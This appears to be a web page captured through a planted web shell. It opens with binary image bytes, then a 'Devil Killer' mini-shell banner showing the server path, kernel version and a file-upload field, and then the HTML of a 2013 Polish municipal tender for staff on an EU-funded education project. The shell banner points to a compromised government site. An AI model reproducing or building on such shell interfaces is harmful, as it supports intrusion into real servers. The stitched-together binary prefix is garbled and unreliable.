JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130328/123514-N-2013.html

<p class="kh_header"><b>Brudzeń Duży: Usługi świadczone przez personel oraz kadrę zarządzającą projektem pn.: Nauka drogą do lepszego jutra</b><br>
<b>Numer ogłoszenia: 123514 - 2013; data zamieszczenia: 28.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Brudzeń Duży , Toruńska 2, 09-414 Brudzeń Duży, woj. mazowieckie, tel. 24 2604081, faks 24 2604081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brudzen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi świadczone przez personel oraz kadrę zarządzającą projektem pn.: Nauka drogą do lepszego jutra.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są świadczone usługi przez personel oraz kadrę zarządzającą projektem pn. Nauka drogą do lepszego jutra - Koordynator projektu 1 osoba, Koordynatorzy szkolni - 3 osoby, Specjalista ds. ewaluacji i monitoringu projektu - 1 osoba, Księgowa/y projektu - 1 osoba, Specjalista ds. kadr - 1 osoba..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu (według wzoru - Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>III.3.4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunki wymienione w pkt. 10.1 niniejszej SIWZ za spełnione, jeżeli Wykonawcy wykażą, że dysponują osobami zdolnymi do wykonania zamówienia, posiadającą kwalifikacje niezbędne do wykonania zamówienia tj. spełniającą łącznie wszystkie wymienione poniżej warunki: Dla części 1.Koordynator projektu: posiadać wykształcenie wyższe magisterskie; posiadać przygotowanie pedagogiczne uprawniające do wykonywania zawodu nauczycielskiego; posiadać ukończone studia wyższe lub podyplomowe na kierunku administracja; posiadać biegłą znajomość programu SAGE Symfonia Kadry i Płace potwierdzoną certyfikatem lub zaświadczeniem; posiadać biegłą znajomość generatora wniosków płatniczych; znać zasady i procedury realizacji i rozliczania projektów finansowanych ze środków Unii Europejskiej, przede wszystkim EFS POKL ;posiadać bardzo dobrą znajomość aktów prawnych, dokumentów i wytycznych aktualnie obowiązujących w ramach POKL na terenie woj. mazowieckiego; wykazać się doświadczeniem w pracy na stanowisku kierownika lub koordynatora projektu w co najmniej pięciu projektach EFS PO KL na łączną kwotę min. 4,5 mln zł, realizowanych przez JST w okresie ostatnich trzech lat przed upływem składania ofert na terenie woj. mazowieckiego; wykazać się doświadczeniem w pracy na stanowisku kierownika lub koordynatora projektu w co najmniej dwóch projektach EFS PO KL z Priorytetu IX Poddziałania 9.1.2 na łączną kwotę min. 1,5 mln zł, realizowanych przez JST na terenie woj. mazowieckiego w okresie ostatnich trzech  lat przed upływem składania ofert, które zostały zakończone i prawidłowo rozliczone przez MJWPU ;posiadać min. 6 miesięczny staż pracownika samorządowego na stanowisku urzędniczym lub asystenta, doradcy w rozumieniu art.4 Ustawy o pracownikach samorządowych (Dz. U. z 2008 nr 223 poz. 1458 );dyspozycyjność poprzez obecność w Biurze projektu tj. siedzibie Zamawiającego co najmniej 4 godziny dziennie w godzinach pracy Urzędu Gminy w Brudzeniu Dużym oraz na każde telefoniczne wezwanie Zamawiającego w ciągu 3 godzin od chwili powiadomienia; -posiadać pełną zdolność do czynności prawnych oraz korzystać z pełni praw publicznych; być osobą dyspozycyjną, wyrażającą się w możliwości osobistego wykonywania przedmiotu zamówienia; posiadać czynne prawo jazdy kat. B; realizacja innych nie wymienionych powyżej zadań niezbędnych do prawidłowego zarządzania projektem. Pełnienie funkcji koordynatora projektu odbywać się będzie pod kierownictwem Zamawiającego oraz w miejscu i czasie przez niego wyznaczonym. Potwierdzeniem spełnienia ww. warunków będą: odpisy (kserokopie) dyplomów ukończenia studiów wyższych magisterskich; odpisy (kserokopie) dyplomów ukończenia studiów wyższych lub podyplomowych lub zaświadczeń o posiadaniu uprawnień pedagogicznych do wykonywania zawodu nauczycielskiego; odpisy (kserokopie) dyplomów ukończenia studiów wyższych lub podyplomowych na kierunku administracja; Certyfikat lub zaświadczenie ukończenia szkolenia/kursu z zakresu obsługi systemu SAGE Symfonia Kadry i Płace; Wykaz spełnienia warunku posiadania niezbędnego doświadczenia i wiedzy dla realizacji przedmiotu zamówienia stanowi zał. Nr 7 do SIWZ, a także przedstawienie referencji, opinii dla spełnienia tego warunku. Dołączyć kserokopie zaświadczeń, certyfikatów i innych dokumentów potwierdzających spełnienie warunku posiadania doświadczenia i wiedzy. Dla części 2, 3, 4. Koordynatorzy szkolni: posiadać wykształcenie  wyższe magisterskie; posiadać stopień nauczyciela dyplomowanego; ukończone studia podyplomowe z zakresu organizacji i zarządzania w oświacie; posiadać staż pracy w zawodzie nauczycielskim min. 15 lat, w tym min. 10 lat na stanowisku kierowniczym w szkole; posiadać pełną zdolność do czynności prawnych oraz korzystać z pełni praw publicznych; posiadać czynne prawo jazdy kat. B; Potwierdzeniem spełnienia ww.warunków będą: spełnieniem warunków będzie poprawnie wypełnione oświadczenie wg formularza załącznik nr 2 do SIWZ; odpisy (kserokopie) dyplomów ukończenia studiów wyższych magisterskich; odpisy (kserokopie) dyplomów ukończenia studiów podyplomowych magisterskich z zakresu organizacji i zarządzania w oświacie; akt nadania stopnia awansu zawodowego nauczyciela dyplomowanego ( ksero); kopia świadectwa pracy, umowy o pracę lub zaświadczenie organu prowadzącego potwierdzające staż pracy na stanowisku kierowniczym w jednostce oświatowej; kserokopia prawa jazdy kat. B. Dla części 5. Specjalista ds. ewaluacji i monitoringu projektu: znać zasady monitoringu i ewaluacji w projektach POKL; posiadać bardzo dobrą znajomość aktualnych wytycznych i dokumentacji obowiązujących w ramach POKL na terenie woj. mazowieckiego; posiadać min. 5 mscy staż w pracy w administracji samorządowej;  posiadać umiejętność obsługi komputera (w tym MS Office, Internetu); posiadać wykształcenie minimum średnie; posiadać pełną zdolność do czynności prawnych oraz korzystać z pełni praw publicznych; być osobą dyspozycyjną, wyrażającą się w możliwości osobistego wykonywania zlecenia; -posiadać czynne prawo jazdy kat. B. Potwierdzeniem spełnienia ww. warunków będą: spełnieniem warunków będzie poprawnie wypełnione oświadczenie wg formularza załącznik nr 2 do SIWZ; odpisy (kserokopie) świadectw ukończenia szkoły średniej lub odpisy (kserokopie) dyplomów studiów wyższych; kserokopia prawa jazdy kat. B. Dla części 6. Księgowa/y projektu: posiadać wykształcenie wyższe: ekonomiczne z zakresu rachunkowości i podatków; posiadać Certyfikat Księgowy wydany przez Ministra Finansów uprawniający do samodzielnego prowadzenia ksiąg rachunkowych; posiadać umiejętność obsługi komputera (w tym MS Office, Internetu, generatora wniosków płatniczych);-znać zasady i procedury realizacji i rozliczania projektów finansowanych ze środków Unii Europejskiej, przede wszystkim EFS POKL; wykazać się prowadzeniem obsługi księgowej, co najmniej jednego projektu współfinansowanego ze środków UE EFS POKL; posiadać pełną zdolność do czynności prawnych oraz korzystać z pełni praw publicznych; być osobą dyspozycyjną, wyrażającą się w możliwości osobistego wykonywania zlecenia; być osobą nie karaną; posiadać czynne prawo jazdy kat. B; być obecną/ym w Biurze projektu tj. siedzibie Zamawiającego co najmniej 2 godziny dziennie w godzinach pracy Urzędu Gminy w Brudzeniu Dużym oraz na każde telefoniczne wezwanie Zamawiającego w ciągu 3 godzin od chwili powiadomienia; realizacja innych nie wymienionych powyżej zadań niezbędnych do prawidłowego zarządzania projektem. Pełnienie funkcji księgowe/ego projektu odbywać się będzie pod kierownictwem Zamawiającego oraz w miejscu i czasie przez niego wyznaczonym. Potwierdzeniem spełnienia ww. warunków będą: odpisy (kserokopie) dyplomów ukończenia studiów wyższych lub podyplomowych, potwierdzające wykształcenie wyższe kierunkowe; kserokopię Certyfikatu Księgowego; Wykaz spełnienia warunku posiadania niezbędnego doświadczenia i wiedzy dla realizacji przedmiotu zamówienia  stanowi zał. Nr 7 do SIWZ (zawierający: tytuły projektów, wartość zrealizowanych nazwę priorytetu i poddziałania PO KL określoną przez MJWPU), a także przedstawienie referencji, opinii dla spełnienia tego warunku.  Dołączyć kserokopie zaświadczeń, certyfikatów i innych potwierdzające uczestnictwo w szkoleniach; kserokopia prawa jazdy kat. B. Dla części 7. Specjalista ds. kadr: Posiadać wykształcenie wyższe - ekonomiczne; Posiadać minimum 5 lata doświadczenia na samodzielnym stanowisku związanym z obsługą kadr  i  płac pracowników; Posiadać bardzo dobrą znajomość programu Symfonia Kadry i Płace, znajomość pakietu MS Office; Posiadać doświadczenie w pracy z programem PŁATNIK; Posiadać praktyczną znajomość zagadnień kadrowo płacowych, ubezpieczeniowych, podatkowych i prawa pracy oraz Kodeksu Cywilnego; Posiadać doskonałą organizację pracy; Być sumiennym i dokładnym. Potwierdzeniem spełnienia ww. warunków będą: odpisy (kserokopie) dyplomów ukończenia studiów wyższych lub podyplomowych, potwierdzające wykształcenie wyższe kierunkowe; Certyfikat lub zaświadczenie ukończenia szkolenia lub kursu z zakresu obsługi systemu SAGE Symfonia Kadry i Płace ( kopia); kopia świadectwa pracy, umowy o pracę lub zaświadczenie potwierdzające staż pracy na samodzielnym stanowisku związanym z obsługą kadr i płac pracowników. W sytuacji, gdy Wykonawca będzie polegał na osobach zdolnych do wykonania zamówienia innych podmiotów musi udowodnić zamawiającemu, iż będzie dysponował osobami niezbędnymi do realizacji zamówienia i przedstawi pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (zgodny z formularzem załącznika nr 1 do SIWZ) oraz wszystkie wymienione w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) W przypadku zmiany stawki podatku VAT w trakcie trwania umowy Zamawiający dokona w drodze aneksu uaktualnienia stawki podatku VAT zgodnie z obowiązującą ustawą od towarów i usług. Uaktualniona stawka podatku VAT będzie obowiązywała w dalszej części realizacji zamówienia wynikającej z umowy;  
b) W zakresie terminu realizacji zamówienia, gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należnego wykonania umowy zgodnie z SIWZ. 
c) W przypadku konieczności wprowadzenia zmian w umowach zawartych między Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami pośredniczącymi w ramach Programu Operacyjnego Kapitał Ludzki.
d) brak środków na realizacje zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brudzen.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brudzeniu Dużym ul. Toruńska 2 , 09-414 Brudzeń Duży - Referat Rozwoju i Rolnictwa 
09-414 Brudzeń Duży ul. Toruńska 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2013 godzina 10:00, miejsce: Urząd Gminy w Brudzeniu Dużym ul. Toruńska 2 , 09-414 Brudzeń Duży - sekretariat
09-414 Brudzeń Duży ul. Toruńska 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.:Nauka drogą do lepszego jutra, współfinansowanego ze środków Unii Europejskiej , Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, 
Priorytet IX - Rozwój wykształcenia i kompetencji w regionach; 
Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty; 
Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koordynator projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki koordynatora projektu:pełne zarządzanie projektem i kierowanie jego realizacją;nadzór nad pracą koordynatorów szkolnych, specjalisty ds. monitoringu i ewaluacji; analiza realizacji harmonogramu;sporządzanie sprawozdań merytoryczno  finansowych; nadzór nad dokumentacją;przygotowywanie wniosków o płatność;przygotowanie materiałów rekrutacyjnych; nadzór nad realizacją podpisywania deklaracji uczestnictwa i przeprowadzanych szkoleń dla rodziców; bieżące kontakty z Instytucją Wdrażającą (Mazowiecką Jednostką Wdrażania Programów Unijnych);działania informacyjno promocyjne;realizacja projektu zgodnie z przyjętym budżetem i harmonogramem;prowadzenie dokumentacji finansowej;nadzór nad pracą specjalisty ds. kadr oraz księgowej/go projektu, poprzez kontrolę sporządzanych list płac pracowników, kart wynagrodzeń, przelewów i wypłat dla pracowników zatrudnionych w ramach projektu oraz zleceniobiorców, planów wydatków projektu i analizę sprawozdawczości budżetowej;obecność podczas kontroli projektu; uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie z ustawą Prawo zamówień publicznych, w zakresie działań projektowych;finansowe zarządzanie projektem w tym nadzór finansowy nad prawidłowością realizacji projektu i planowanie wydatków na kolejne okresy sprawozdawcze;nadzór nad zachowaniem zgodności działań z wnioskiem o dofinansowanie i umową;koordynacja całości projektu pod względem formalno merytorycznym;nadzór nad prawidłowym wykorzystaniem budżetu;nabór uczestników;wybór wykonawców i Zleceniobiorców zgodnie z wymogami obowiązującymi; przeprowadzenie przynajmniej raz w tygodniu monitoringu organizacyjnego, poprzez kontrolę prowadzonych zajęć na miejscu w szkołach; kontrola współpracy nauczycieli i specjalistów z rodzicami;stały kontakt z osobami decyzyjnymi szkół w celu omawiania bieżących spraw i reagowania na potencjalne nieprawidłowości; po zakończeniu realizacji projektu rozliczenie finansowe i merytoryczne projektu, zgodnie z zapisami umowy o dofinansowanie, w tym sporządzenie końcowego wniosku o płatność i wprowadzenie wszelkich uwag naniesionych przez Jednostkę Wdrażającą do czasu zatwierdzenia rozliczenia końcowego projektu; realizacja innych nie wymienionych powyżej zadań niezbędnych do prawidłowego zarządzania projektem. Pełnienie funkcji koordynatora odbywać się będzie pod kierownictwem Zamawiającego oraz w miejscu i czasie przez niego wyznaczonym; w celu właściwego wykonania przedmiotu zamówienia wykonawca będzie obecny w biurze projektu tj. siedzibie Zamawiającego co najmniej 4 godziny dziennie w godzinach pracy Urzędu Gminy w Brudzeniu Dużym oraz na każde telefoniczne wezwanie Zamawiającego w ciągu 3 godzin od chwili powiadomienia; faktycznie przepracowany czas przez Koordynatora projektu w siedzibie Zamawiającego będzie kontrolowany za pomocną listy obecności, która będzie podstawą do zatwierdzenia wynagrodzenia w każdym przepracowanym miesiącu realizacji projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koordynator szkolny w Zespole Szkół w Siecieniu.</p>
